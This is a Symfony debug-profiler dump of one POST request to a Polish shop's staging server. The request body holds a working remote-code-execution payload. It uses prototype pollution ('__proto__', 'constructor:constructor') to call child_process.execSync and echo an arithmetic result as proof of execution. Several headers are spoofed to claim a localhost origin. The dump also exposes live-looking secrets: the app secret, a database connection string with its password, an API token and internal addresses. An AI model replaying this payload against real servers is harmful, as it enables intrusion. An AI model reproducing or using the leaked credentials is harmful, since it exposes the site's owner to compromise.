HomePageController :: indexAction
Request
GET Parameters
| Key | Value |
|---|---|
| _cb | "6384855596892450575" |
POST Parameters
| Key | Value |
|---|---|
| 0 | "{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo\\x00 $((40827*42256))'.replace(/\\x00/g,''),{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}" |
| 1 | ""$@0"" |
| 2 | "[]" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _controller | "WellCommerce\Bundle\AppBundle\Controller\Front\HomePageController::indexAction" |
| _firewall_context | "security.firewall.map.context.client" |
| _route | "front.home_page.index" |
| _route_params | [] |
| _stopwatch_token | "d749e6" |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| accept-encoding | "gzip" |
| accept-language | "de-DE,de;q=0.9,en;q=0.8" |
| cache-control | "no-cache, no-store, must-revalidate, max-age=0" |
| cf-connecting-ip | "127.0.0.1" |
| content-length | "740" |
| content-type | "multipart/form-data; boundary=----WebKitFormBoundaryevnpdxgngxqempfg" |
| expires | "0" |
| host | "api.stage.mmtsklep.pl" |
| next-action | "360e5afd2883bd9bf3ff7b9dc8a50901acbe4482" |
| origin | "https://api.stage.mmtsklep.pl?_cb=6384855596892450575" |
| pragma | "no-cache" |
| sec-fetch-dest | "empty" |
| sec-fetch-mode | "cors" |
| sec-fetch-site | "same-origin" |
| true-client-ip | "127.0.0.1" |
| user-agent | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" |
| x-client-ip | "127.0.0.1" |
| x-forwarded-for | "127.0.0.1" |
| x-nextjs-request-id | "442e5d1673c6ae79" |
| x-originating-ip | "127.0.0.1" |
| x-php-ob-level | "1" |
| x-real-ip | "127.0.0.1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Fri, 13 Mar 2026 15:07:59 GMT" |
| location | "https://api.stage.mmtsklep.pl/admin/user/login" |
| x-debug-token | "d51e83" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
| Key | Value |
|---|---|
| Created | "Fri, 13 Mar 26 16:07:59 +0100" |
| Last used | "Fri, 13 Mar 26 16:07:59 +0100" |
| Lifetime | 0 |
Session Attributes
| Attribute | Value |
|---|---|
| _currency | "PLN" |
| client/shop/id | 1 |
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| APP_ENV | "stage" |
| APP_SECRET | "b258b1d3933558f9f7a20105ab9a75ff" |
| APP_VERSION | "1.0.0" |
| DATABASE_URL | "mysql://upadmin:AVNS_pnPs51plVk1f6pbBf9w@unisport-czaoocizmapm.db.upclouddatabases.com:11550/stage?serverVersion=8.0" |
| DATABASE_VERSION | "8.0.21" |
| GOOGLE_RECAPTCHA_SECRET | "" |
| GOOGLE_RECAPTCHA_SITE_KEY | "" |
| MAILER_URL | "null://localhost" |
| MESSENGER_TRANSPORT_DSN | "redis://localhost:6379/messages_stage" |
| PHP_BIN_PATH | "php" |
| POLKA_API_TOKEN | "12V9Z8785Z7478P0T6GD80T3786P41" |
| POLKA_API_URL | "http://185.54.186.197:8083/" |
| REDIS_HOST | "localhost" |
| REDIS_PORT | "6379" |
| SEARCH_ADAPTER | "elasticsearch" |
| SENTRY_DSN | "" |
| WKHTMLTOIMAGE_PATH | "/usr/local/bin/wkhtmltoimage" |
| WKHTMLTOPDF_PATH | "/usr/local/bin/wkhtmltopdf" |
Defined as regular env variables
| Key | Value |
|---|---|
| CONTENT_LENGTH | "740" |
| CONTENT_TYPE | "multipart/form-data; boundary=----WebKitFormBoundaryevnpdxgngxqempfg" |
| DOCUMENT_ROOT | "/var/www/domains/api.stage.mmtsklep.pl/current/public" |
| DOCUMENT_URI | "/index.php" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_ACCEPT_ENCODING | "gzip" |
| HTTP_ACCEPT_LANGUAGE | "de-DE,de;q=0.9,en;q=0.8" |
| HTTP_CACHE_CONTROL | "no-cache, no-store, must-revalidate, max-age=0" |
| HTTP_CF_CONNECTING_IP | "127.0.0.1" |
| HTTP_CONTENT_LENGTH | "740" |
| HTTP_CONTENT_TYPE | "multipart/form-data; boundary=----WebKitFormBoundaryevnpdxgngxqempfg" |
| HTTP_EXPIRES | "0" |
| HTTP_HOST | "api.stage.mmtsklep.pl" |
| HTTP_NEXT_ACTION | "360e5afd2883bd9bf3ff7b9dc8a50901acbe4482" |
| HTTP_ORIGIN | "https://api.stage.mmtsklep.pl?_cb=6384855596892450575" |
| HTTP_PRAGMA | "no-cache" |
| HTTP_SEC_FETCH_DEST | "empty" |
| HTTP_SEC_FETCH_MODE | "cors" |
| HTTP_SEC_FETCH_SITE | "same-origin" |
| HTTP_TRUE_CLIENT_IP | "127.0.0.1" |
| HTTP_USER_AGENT | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" |
| HTTP_X_CLIENT_IP | "127.0.0.1" |
| HTTP_X_FORWARDED_FOR | "127.0.0.1" |
| HTTP_X_NEXTJS_REQUEST_ID | "442e5d1673c6ae79" |
| HTTP_X_ORIGINATING_IP | "127.0.0.1" |
| HTTP_X_REAL_IP | "127.0.0.1" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "_cb=6384855596892450575" |
| REDIRECT_STATUS | "200" |
| REMOTE_ADDR | "185.177.72.153" |
| REMOTE_PORT | "8767" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1773414479 |
| REQUEST_TIME_FLOAT | 1773414479.2865 |
| REQUEST_URI | "/?_cb=6384855596892450575" |
| SCRIPT_FILENAME | "/var/www/domains/api.stage.mmtsklep.pl/current/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "185.70.196.41" |
| SERVER_NAME | "api.stage.mmtsklep.pl" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SOFTWARE | "nginx/1.18.0" |
| SYMFONY_DOTENV_VARS | "APP_VERSION,APP_SECRET,MAILER_URL,GOOGLE_RECAPTCHA_SITE_KEY,GOOGLE_RECAPTCHA_SECRET,WKHTMLTOPDF_PATH,WKHTMLTOIMAGE_PATH,SEARCH_ADAPTER,PHP_BIN_PATH,SENTRY_DSN,POLKA_API_URL,POLKA_API_TOKEN,APP_ENV,APP_DEBUG,DATABASE_URL,DATABASE_VERSION,REDIS_HOST,REDIS_PORT,MESSENGER_TRANSPORT_DSN" |
| USER | "www-data" |